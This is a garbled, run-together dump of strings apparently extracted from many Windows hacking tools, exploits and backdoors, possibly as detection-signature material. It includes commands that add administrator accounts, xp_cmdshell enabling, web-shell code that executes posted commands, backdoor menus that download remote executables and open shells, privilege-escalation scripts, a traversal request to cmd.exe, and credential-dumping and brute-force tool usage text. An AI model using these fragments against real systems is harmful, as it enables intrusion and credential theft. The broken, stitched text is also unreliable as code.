0; Password - 0; Combination - 0Create %d IP@Loginl;PasswordUBrute.comhttp://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=N
OnGetPasswordPhttp://www.chinesehack.org/Global\\ps%08xStrStrAStrToIntAnessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%dA FsSniffer backdoor seems to be running on this port%s/churrasco/-->Usage: Churrasco.exe \"command to run\"/churrasco/-->Done, command should have ran as SYSTEM!MZKERNEL32.DLLUpackByDwing@E-Mail  : admin@luocong.comHomepage: http://www.luocong.com: %d  -  ustrreffix.dllUltra String Reference plugin v%d.%02dXScanLib.dllPorts/%s/%dDEFAULT-TCP-PORTPlugCheckTcpPortIdtTool.sysI
\\\\.\\slIdtTool[*] Token system command[*] command add user 90sec 90sec[*] Add to Administrators success[*] User has been successfully addedProgram: %s%s%s%s%s%s%s%s%s%s%sc
http://www.vip80000.com/hot/index.htmlGetConnectStringCnCerT.Safe.SSClone.dll(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPGklock.dllE
get_Form1h
Iv\\SmSsWinStationApiPort 
KvInterlockedCompareExchange 
--- ScanMs Tool --- (c) 2003 Internet Security Systems ---Scans for systems vulnerable to MS03-026 vulnMore accurate for WinXP/Win2k, less accurate for WinNTadded %d.%d.%d.%d-%d.%d.%d.%dInternet Explorer 1.0t
-m MINLEN  minimum length of a valid passwordhttp://www.thc.orgUse for hacking: trim your dictionary file to the pw requirements of the target.W
You Already Loaded This DLL ! :(D
Can't Load This Dll ! :( 
<a href=\"http://www.xfocus.net\">X-Scan</a>REPORT-ANALYSIS-OF-HOST\\\\localhostiis.run>Could not connecto %sN
SELECT A.USER FROM SYS.USER_USERS A OCI 8 - OCIDescriptorFreeORACommand *msvbvm60.dll_CIcoscKmhV0
c:\\Documents and Settings\\Administrator\\Got WMI process Pid: %dThis exploit will executeRunning reverse shell<description>CHKen QQ:41901298</description>version=\"9.9.9.9\"name=\"CH.Ken.Tool\"to HOST!SS.EXElstrlen0RtlUnwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedFailed to execute shell, error = %sUDP listen needs -p arghttp://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORDUsername: \"%s\", Password: \"%s\", Remarks: \"%s\"user:\"%s\" pass: \"%s\" result=\"%s\"Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)L
clnt_raw.c - Fatal header serialization error.svctcp_.c - cannot getsockname or listentoo many connections (%d), compilation constant FD_SETSIZE was only %dsvc_run: - select failed@(#)bindresvport.cH
RestTool.EXEH
C:\\WINDOWS\\temp\\pojie.exe /l=C:\\WINDOWS\\temp\\s.exeC:\\WINDOWS\\temp\\s.exe tcp explorer.exe http://www.hackdos.comFailed to read file or invalid data in file!WTNE / MADE BY E COMPILER - WUTAO The interface of kernel library is invalid!eventvwrFailed to decompress data!NOTEPAD.EXE result.txtGetLogonS/showthread.php?t=156643sedebugnameValueUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322SOFTWARE\\Classes\\HTTP\\shell\\open\\commandSYSTEM\\ControlSet001\\Services\\%sGlobal\\%s-key-event%d%d.exeGlobal\\%s-key-metuxGET / HTTP/1.1qy001id=%d;qy001guid=%s'SeDebugPrivilegeOpen Author: Cyg07*2from golds7n[LAG]'JDAMAGEUnHook IoGetDeviceObjectPointer ok!\
EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'Password.txtLoginPromptA
<description>BYTELINKER.COM</description>myupnp.exeC:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shellC
- Rewritten by HDM last <hdm [at] metasploit.com>- Usage: %s <Target ID> <Target IP>- Remote DCOM RPC Buffer Overflow Exploit- Warning:This Code is more like a dos tool!(Modify by pingker)Windows NT SP6 (Chinese)- Original code by FlashSky and Benjurry\
shell3all.cIsDebug.dllS
(IsDebuggerPresent byte Patcher)Error WriteMemory failedIsDebugPresentidb_AutoloadBin FilesMASM32 versionH
%SystemRoot%\\system32\\PipeCmdSrv.exeP
Please Use NTCmd.exe Run This Program.%s\\pipe\\%s%s%d%s\\ADMIN$\\System32\\%s%sConnecting to Remote Server ...FailedP
fpipe -l 53 -s 53 -r 80 192.168.1.101F
http://www.foundstone.com%s %s port %d. Address is already in usew03a2409.dllR
xsiff.exe -pass -hide -log pass.logHOST: %s USER: %s, PASS: %sxsiff.exe -tcp -udp -asc -addr 192.168.1.1Code by glacier <glacier@xfocus.org>%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%dR
OpenProcessCmdExecute!http://www.hackp.com'
SaveSelectedFilterCmdExecutePasswordChar@WSockHook.DLLPsInitialSystemProcess @%pPsLookupProcessByProcessId(%u) FailedPsLookupProcessByProcessId(%u) => %pFirstStage() Loaded, CurrentThread @%p Stack %p - %pdic\\loginlist.txtRadmin.exelamescan3.pdf!dic\\passlist.txtQy001Service/.MIKYC
ProcessXElementset_Timer1Watchdog thread %d waiting on MutexExploit ok run command\\epathobj_exp\\Release\\epathobj_exp.pdbAlllocated userspace PATHRECORD () %pMutex object did not timeout, list not patchedGET /ok.asp?id=1__sql__ HTTP/1.1F
Host: 127.0.0.1AJunk.dllA
ADVAPI32.DLLVERSION.DLLWSOCK32.DLLCOMCTL32.DLLOLEAUT32.DLLGetFileVersionInfoAImageList_AddActivateKeyboardLayoutB
IoDeleteSymbolicLinkIoDeleteDeviceIoCreateSymbolicLinkuser32.dllyruntime errorAppIDFlagsGetLagLookupAccc:\\Users\\careful_snow\\Desktop\\Htran\\Release\\Htran.pdb=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] T
ntwdblib.dllT
dbnextrow[Usage]:  %s <HostName|IP> <UserName> <Password>=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============Cool! Connected to SQL server on %s successfully!EXEC master..xp_cmdshell \"%s\"=======================Sqlcmd v0.21 For HScan v1.20=======================Error,exit!Sqlcmd>h
_AutoAttackMain_frmIpToAddr!Win32 .EXE.XOLEHLP.dllDtcGetTransactionManagerExAGetUserNameAPacketSendPacketArpSniffpcap_loopSyntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p PW-Inspectori:o:m:M:c:lunpsP
Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)Example: xport www.xxx.com 80 -m syn%s - command line port scannerxport 192.168.1.1 1-1024 -t 200 -vUsage: xport <Host> <Ports Scope> [Options].\\port.iniPort scan complete, total %d port, %d port is opened, use %d ms.http://www.xfocus.orgP
%CommonProgramFiles%\\GetRand.dll<description>IEBars</description>R
GIF89Unlock\\i386\\Hello.pdbOS not supported.N
-->Got WMI process Pid: %d This exploit will execute \"net user net user temp 123456 /add & net localgroup administrators temp /addRunning command with SYSTEM Token...Thread impersonating, got NETWORK SERVICE Token: 0x%xFound SYSTEM token 0x%xThread not impersonating, looking for another thread...P
MSIE 5.5;\
%s -mutex %s -host %s -index %d -config \"%s\"www.target.com%s\\scripts\\desc\\%s.desc%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20%s -h www.target.com -all.\\report\\%s-%s.html.\\log\\Hscan.log[%s]: Found cisco Enable password: %s !!!%s@ftpscan#FTP Account:  %s/[null].\\conf\\mysql_pass.dicTry the first %d time-->Build&&Change By p r
%d of %d target%s%scompleted, %lu valid password%s found[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORDhydra -P pass.txt target cisco-enable  (direct console access)[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED[ERROR] SMTP LOGIN AUTH, either this auth is disabled\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"used pepack!\\temp\\NtGodMode.exentgod.batsfxcmdC:\\temp\\vncviewer4.log[BL4CK] Patched by redsand || http://blacksecurity.orgfake release extendedVkey 0x%x, keysym 0x%xpipecmd \\\\%s -U:%s -P:\"\" %s[Usage]:  %s <HostName|IP> <Username> <Password>pipecmd \\\\%s -U:%s -P:%s %s============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net===================================NTcmd v0.11 for HScan v1.20=======================NTcmd>mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txtSuccessfully --> username %s password %s zhouzhen@gmail.com http://zhouzhen.eviloctal.org-a automode  automatic crack the mysql password mysql_pwd_crack 127.0.0.1 -x 3306 -aC
ServiceCmdShell<!-- If your application is designed to work with Windows 8.1, uncomment the folS
c:\\windows\\system32\\command.com /c Easy Usage Version -- Edited By: racle@tian6.comOH,Sry.Too long command.Success! Commander.Hey,how can racle work without ur command ?The exploit thread was unable to map the virtual 8086 address space[+] Usage: VNC_bypauth <target> <scantype> <option>========RealVNC <= 4.1.1 Bypass Authentication Scanner=======[+] Type VNC_bypauth <target>,<scantype> or <option> for more informationsVNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d  connection closedprogram termingwww.icehack.yoda & M.o.D.-> come.to/f2f **************C:\\TEMP\\$530 Please login with USER and PASS._Shell.exeftpcWaitingPassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=ListViewProcessListColumnClick!http://iframe.ip138.com/ic.aspUsage : ms11-080.exe cmd.exe Command \\ms11080\\ms11080\\Debug\\ms11080.pdb[>] by:Mer4en7y@90sec.org[>] create porcess error[>] ms11-080 ExploitUsage:system_exp.exe \"cmd\"The shell \"cmd\" success!Not Windows NT family OS.Unable to get kernel base address.run \"%s\" failed,code: %dWindows Kernel Local Privilege Exploit h
[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICEcn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.comMYBLOG:HTTP://HI.BAIDU.COM/0X24QUSER_NAMEFROMWWHERED
PortListfNo.533.netexitfckappfree.dllk
support@nirsoft.net0</requestedPrivileges></security></trustInfo></assembly>Pass,Config,n{)phMYSQLZ\\DHLP\\.\\dhlp\\.SHAutoCompleMainFrameK
The ordinal %u could not be located in the dynamic link library %sGetModuleHandleAodbc32.dllE
http://www.wzpg.comipsearcher\\ipsearcher\\Release\\ipsearcher.pdb_GetAddressipsearcher.dllDojibiron by Ronald Huizer, (c) master#h4cker.us  [%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!%s@ftpscan#Cracked account:  %s/%s[%s]: Found \"FTP account: %s/%s\" !!![>] ms11-08 Exploit\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb-
kelloworld.dllk
%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100sfUserAppDataRoaming$TRzFrameControllerPropertyConnectiondelphi32.exehkeyCurrentUser%
Citadel hooking error[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ...[%s]: IPC NULL session connection success !!!Scan %d targets,use %4.1f minuteshttp://blog.gentilkiwi.com/mimikatzBenjamin DelpyGlobalSignC
WBruteerror.txtgood.txtsource.txtbad.txtGenerator IP@Login;Passwordset /p \"=4d5apowershell -Command \"$hex=set+%2Fp+%22%3D4d5powershell+-Command+%22%24hexecho 4d 5a echo r cx >>echo+4d+5a+echo+r+cx+%3E%3E%
WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found.dump output to a file, -o filenameThis tool lists the active LSA logon sessions with NTLM credentials.Error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllCannot get LSASS.EXE PID!<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security TechnologiesThis tool allows you to change the NTLM credentials of the current logon sessionusername:domainname:lmhash:nthashError in cmdline!. Bye!.Error: Cannot open LSASS.EXE!.nthash is too long!.LSASS HANDLE: %xgenhash.exe <password>Password: %s%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2XThis tool generates LM and NT hashes.(hashes format: LM Hash:NT hash)LSASRV.DLLiamdll.dllChangeCredsiam.exe -h administrator:mydomain:An error was encountered when trying to change the current logon credentials!.optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter.IAM.EXE will try to locate some memory locations instead of using hard-coded values.Checking LSASRV.DLL....c:\\debug.txt\"Primary\" string found at %.8Xh\"Primary\" string not found!segment 1 found at %.8Xhspecify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESCould not enable debug privileges. You must run this tool with an account with administrator privileges.-B is now used by default. 
Trying to find correct addresses..OpenProcessToken() error: 0x%08X%d dumpedAdjustTokenPrivileges() error: 0x%08X\\SAM-%u.dmpextract the TGT session keygetlsasrvaddr.exeCannot get PID of LSASS.EXEPPWDUMP_DATAUsage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNaUnable to query service status. Something is wrong, please manually check the stpwdump6 Version %s by fizzgig and the mighty group at foofus.net00050;0F0M0X0a0v0}0vwgvwgvP76Pr0PhOFyPUnable to uninstall the fgexec serviceUnable to set socket to sniffDump system passwordsError opening sam hive or not valid fileCouldn't find LSASS pidsamdump.dllWPEPRO SEND PACKETWPE-C1467211-7C89-49c5-801A-1D048E4014C4Usage: unshadow PASSWORD-FILE SHADOW-FILEarpspoof\\DebugSuccess: The log has been clearedclearlogs [\\\\computernameDumpUsers 1.dictionary attack with specified dictionary fileby Objectif Securiteobjectif-securiteCannot query LSA Secret on remote hostCannot write to process memory on remote hostCannot start PWDumpX service on hostusage: %s <system hive> <security hive>username:domainname:LMhash:NThash<server_name_or_ip> | -f <server_list_file> [username] [password]Impersonation Tokens Availablefailed to parse pwdump format stringDumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,NcrackOutputTable only supports adding up to 4096 to a cell viaexcept SqlmapBaseException, ex:Scan Ports EveryScan All Possible Ports!dIJMuX$aO-EVXELUxP\"-\\KaR\"U'}-M,.V.)\\ZDxpLSavDecompress errorCan't load libraryCan't load functioncom0tl32:.dDescription|soft Visual Studio\\VB9ypadj_fptan?4DOWS\\SyMem32\\/oIconExNBTScanner!y&WCAP;}ECTEDNotSupportedSCAN.VERSION{_W
WSocketResolveHost: Cannot convert host address '%s'tcp is the only protocol supported thru socks serverDarkKnightIPStealerUtilities td class=\"summO1\">REM'EBAqRISECorExitProcess'msc#eAuto Scroll BOTH Text BoxesStart/Stop PortscanningAuto Save LogFile by pressing STOPGET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLBdwGetAddressForObjectColor Transfer SettingsFX Global Lighting AngleVersion compatibility infoNew Windows ThumbnailLayer ID Generator BaseColor Halftone SettingsC:\\WINDOWS\\SYSTEM\\MSWINSCK.ocaDarKPaiN=BITCHIN THREADS)PuMB_syJ&,fARW>yRm3hm3t_rullaz7Projectc1Ten-GGl\"/Moziqlxa0    :SCAN BEGUN ON PORT:0    :PORTSCAN READY.Corrupt Data!K4p~omkIzDllTrojanScanGetDllInfoCompressed by Petite (c)1999 Ian Luck.GetFileCRC32GetTrojanNumberTFAKAboutBasic PortScannerNow scanning port:This program was made by Volker VossJiBOo~SSBexample: iis 10.10.10.10send error<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>This tool may be used only by system administrators. I am not responsible for _H/EnumDisplay/ECTED.MSVCRT0xNotSupported7NeoWait.exeRRRRRRRWIP.txtxiaoyuers
__GetMainArgsWS2_32.DLLWININET.DLLFreeSidToAsciiRedirect SPort RemoteHost RPort  -->Port RedirectorPOST /scripts/WWPMsg.dll HTTP/1.0http://IP/a.exe a.exe            -->Download A FileHost: wwp.mirabilis.com:80%s -Set Port PortNumber              -->Set The Service PortShell                            -->Get A ShellDeleteService ServiceName        -->Delete A ServiceGetting The UserName(%c%s%c)-->ID(0x%s) Successfully%s -Set ServiceName ServiceName      -->Set The Service Name[ValidateRange(1, 65535)]$Client = New-Object -TypeName System.Net.Sockets.TcpClient$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSizeI
Reply-To: %shtml htm htx aspfor /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (in ('tasklist /fi \"PID eq %%b\" /FO CSV') do @echo offG
\\Result.txtBy:ZT QQ:376789051(
for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txtif not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%Bf **************forming Time: %d/1
del Weak1.txtdel Attack.txtdel /s /Q C:\\Windows\\system32\\doors\\!&start iexplore http://www.crsky.com/soft/4818.html)UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU_CREDSUsing WCE R
This operating system is not supported.Win32 only![LordPE]CRTDLL.dllVBScriptCoUninitializeThe RevelationHelper.DLL file is corrupt or missing.B
RevelationHelper.dllobjShell.Run \"schtasks /change /TN wDw00t /disable\",,TrueobjShell.Run \"schtasks /run /TN wDw00t\",,True'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,Truea.WriteLine (\"schtasks /delete /f /TN wDw00t\")a.WriteLine (\"net user /add ikat ikat\")a.WriteLine (\"cmd.exe\")strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"For n = 1 To (Len (hexXML) - 1) step 2output.writeline \" Should work on Vista/Win7/2008 x86/x64\"Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"a.WriteLine (\"net localgroup administrators /add v4l\")Set ts = fso.createtextfile (\"wDw00t.xml\")Extended Module: super mario brothersofpurenostalgicfeeling-supermariobrotheretic!http://132.147.96.202:80iKAT Exe Templatewithadancyflavour..FastTracker v2.00   R
extension: .dllI
Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm).Shinysoft Limited1Shinysoft Limited0Wellington1Wainuiomata156 Wright St1UTN-USERFirst-ObjectNew Zealand1Failed to get temp file for source AES decryptionFailed to get encryption header for pwd-protectFailed to get filetimeFailed to delete temp file for password decoding (3)<IconFile>C:\\WINDOWS\\App.ico</IconFile>Failed to read the entire file<VersionCreatedBy>14.4.0</VersionCreatedBy><ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</PRunning Zip pipeline...<FinTitle /><AutoTemp>0</AutoTemp><DefaultDir>%TEMP%</DefaultDir>AES Encrypting...<UnzipDir>%TEMP%</UnzipDir>/BypassUac/BypassUac/BypassUac_Utils.cpp/BypassUac/BypassUacDll/BypassUacDll.aps/BypassUac/BypassUac/BypassUac.icoB
\\Release\\BypassUacDllW
/x86/BypassUac.exe/x64/BypassUac.exe/x86/BypassUacDll.dll/x64/BypassUacDll.dllAFX_IDP_COMMAND_FAILUREW
steam_ker.dllfor /f %%a in (host.txt) do (for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txtdel host.txt /qfor /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txtstart Http.exe %%a %http%del Result.txt s2.txt s1.txt nc [-options] hostname port[s] [ports] ... gethostpoop fuxoredVERNOTSUPPORTED%s [%s] %d (%s) `--%s' doesn't allow an argumentMS08-067 Exploit for CN by EMM@ph4nt0m.orgMake SMB Connection error:%dSend Payload Over!Maybe Patched!RpcExceptionCode() = %up
\\\\%s\\IPCs.exe %s %s %s %s %d /saves.exe start error...%dEXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'EXEC master..xp_cmdshell 'wscript.exe cc.js'Usage:sql.exe [options]%s root %s %d errorPass.txtSELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_xscan.batGOGOGO.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batNormal Scan: About To Scan %u IP For %u Ports Using %d ThreadSYN Scan: About To Scan %u IP For %u Ports Using %d ThreadExample: %s TCP 12.12.12.12 12.12.12.254 21 512 /BannerSomething Wrong About The PortsPerforming Time: %d/%d/%d %d:%d:%d --> Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save%u Ports Scanned.Taking %d Threads %-16s %-5d -> \"%s\"SYN Scan Can Only Perform On WIN 2K Or AboveSYN Scan: About To Scan %s:%d Using %d ThreadScan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakIF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del *.tzddosdel /f tcpip.sysif /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batIF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config LmHosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingMultithreading Posts_Send KillerGET [Access Point] HTTP/1.1The program's need files was not exist!J
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)  ( /s ) :forms.vbpforms.vcpSoftware\\FlySky\\E\\Installname=\"Microsoft.Windows.Common-Controls\" E
POST %HsRPCRT4.DLLWNetAddConnection2ANdrPointerBufferSize_controlfpfor /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (Blast.bat /r 600Blast.bat /l Blast.batBlast.bat /c 600start Clear.bats syn %%i %%j 3306 /savestart Thecard.batsetlocal enabledelayedexpansionConsys21.dll3
Beijing1del /f /s /q %systemdrive%\\*.log    del /f /s /q %windir%\\*.bak    del /f /s /q %systemdrive%\\*.chk    del /f /s /q %systemdrive%\\*.tmp    del /f /q %userprofile%\\COOKIES s\\*.*    rd /s /q %windir%\\temp & md %windir%\\temp    del /f /s /q %systemdrive%\\recycled\\*.*    del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   tasklist |find \"Clear.bat\"||start Clear.batHttp://www.coffeewl.comping -n 2 localhost 1>nul 2>nulfor /L %%a in (MODE con: COLS=42 lines=5Text Files (*.txt);;All Files (*)http://ubrute.comIP - %d; Password - %d; Combination - %dget_CrackedCredentialsS
coded by fLaShget_grbToolsScaningCrackingRestore=1Thread=Running=1CheckCombination=AutoSave=1.000000TryConnect=Tray=Programming by JD Glaser - All Rights ReservedUsage - hunt \\\\servername.
SMB share enumerator and admin finder Hunt only runs on Windows NT...User = %SAdmin is %s\\%sERROR!!! Bad host lookup. Program Terminate.ERROR No.2!!! Program Terminate.Local Host Name: %sPacked by exe32pack 1.38Local Computer Name: %sLocal IP Adress: %sArtTrayHookDll.dll?TerminateHook@@YAXXZs
C:\\Program Files\\DevStudio\\VB\\VB5.OLBM
Command1_Clicks
vb5chs.dllMSVBVM50.DLLsystem.dllset sys=server.CreateObject (\"system.contral\") Public Function reboot(atype As Variant)t& = ExitWindowsEx(1, atype)atype=request(\"atype\") AceiveX dllDeclare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal sys.reboot(atype)' -- check for a command that we have posted -- 'szTempFile = \"C:\\\" & oFileSys.GetTempName( )<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY><input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)szCMD = Request.Form(\".CMD\")%s Server.exeService Port: %sThe Port Must Been >0 & <655353--Set Server PortThe Server Password Exceeds 32 CharactersService Name: %sServer Password: %sInject Process Name: %sWinEggDrop Shell CongiratorError get globalgroup memebers: NERR_InvalidComputerError get users from server!get in nt by name and nullget something from nt, hold by killusa.Logon.exeDomain And User:PID=Get Addr$(): Onepsapi.dllKT
iphlpapi.DLLystem\\CurrentCorolSet\\Port.TXV1.2 BGET A HTTP/1.0E
XYZCmd V1.0 For NT S= Click here if you want to get your registered copy of ASPack;  For beginning of translate - copy english.ini into the yourlanguage.iniE-Mail:                      shinlan@km169.net;  Please, translate text only after simbol '='= Compress with ASPackresponse.write \"<a href='index.asp'>if Request.Cookies(\"password\")=\"whichdir=server.mappath(Request(\"path\"))Set fs = CreateObject(\"Scripting.FileSystemObject\")whichdir=Request(\"path\")Hit [Enter] to begin command mode...If you are in command mode,[/l] lists all the drives the monitor is currently attached toF
ERROR starting FileSpy...exe\\filespy.dbg[/d <drive>] detaches monitor from <drive>Should be logging to screen...Filmon:  Unknown log record typed:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dlleditKeyLog.exe KeyLog.exe,WinEggDrop.DLLEditKeyLog.exewineggdropPassSniffer.exePOP3/FTP SnifferPassword Sniffer V1.0\"gina\"=\"gina.dll\"REGEDIT4[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]N
Press Any KeEnter 1 OBon >0 & <65535L--Choose VersionExA Only RuntUZemcpysetprintf\\WSFtartupresponse.write \"command completed success!\" for each co in foditems <input type=text name=text6 value=\"<%= szCMD6 %>\"><br> <title>Hello! Welcome </title>%s -Install                          -->To Install The Service%s -Start                            -->To Start The Service%s -Stop                             -->To Stop The ServiceThe Port Is Out Of RangeFail To Set The Port\\psapi.dllTInject.DllSoftware\\Microsoft\\Internet Explorer\\WinEggDropShellinjectt.exeSniffer.dll:Execute net.exe user Administrator passFport.exe or mport.exe :Password Sniffering Is Running |Not Running : The Terminal Service Port Has Been Set To NewPort: Del www.exe                   :Dir *.exe                    param = \"driver={Microsoft Access Driver (*.mdb)}\" conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") set rs=conn.execute (sql)%> <%set Conn = Server.CreateObject(\"ADODB.Connection\") <%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh sql=\"select * from scjh\" E
haoq@neusoft.comQQ2000b.exe\\qq2000b.exeW
SOFTWARE\\HAOQIANG\\Redirect SPort RemoteHost RPort       -->Port Redirectorhttp://IP/a.exe a.exe                 -->Download A FileStopSniffer                           -->Stop Pass SnifferTerminalPort Port                     -->Set New Terminal PortExample: Http://12.12.12.12/a.exe abc.exeCreate Password Sniffering Thread Successfully. Status:LoggingStartSniffer NIC                      -->Start SnifferShell                                 -->Get A ShellDeleteService ServiceName             -->Delete A ServiceDisconnect ThreadNumber|All           -->Disconnect OthersOnline                                -->List All Connected IPExample: Set REG_SZ Test Trojan.exeExecute Program                       -->Execute A ProgramReboot                                -->Reboot The SystemPassword Sniffering Is Not RunningProcess child = Runtime.getRuntime().exec(InputStream in = child.getInputStream();String cmd = request.getParameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>R
<br><p align=\"center\"><b>RangeScan Produced by isn03.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exeFail To InjectBtGRemote Pro; V1.5 B/{Permission denial to EXEC command.:(by Eyas<cooleyas@21cn.com>Connect to %s MSSQL server success.Enjoy the shell.^_^Usage: %s <host> <uid> <pwd>SqlCmd2.exe Inside Edition.Http://www.patching.net  2000/12/14Example: %s 192.168.0.1 sa \"\"A
port - Port to listen on, defaults to 2323Usage: srvcmd.exe [/h] [port]/h   - Hide WindowAccepted connection from client at %sError %d: %sh
Player.tmpP
mailto:sdemo@263.netS-Player.exeh
 http://arm.533.netTftpd32.hlpTimeouts and Ports should be numerical and can not be 0T
%d -- %sTIMEOUT while waiting for Ack block %d. file <%s>TftpPortTtftpd32BackGroundSOFTWARE\\TFTPD32E
Accessories\\wordpad.exegorillanation.comBefore editing the content of a cookie, you should close all windows of Internethttp://nirsoft.cjb.netA
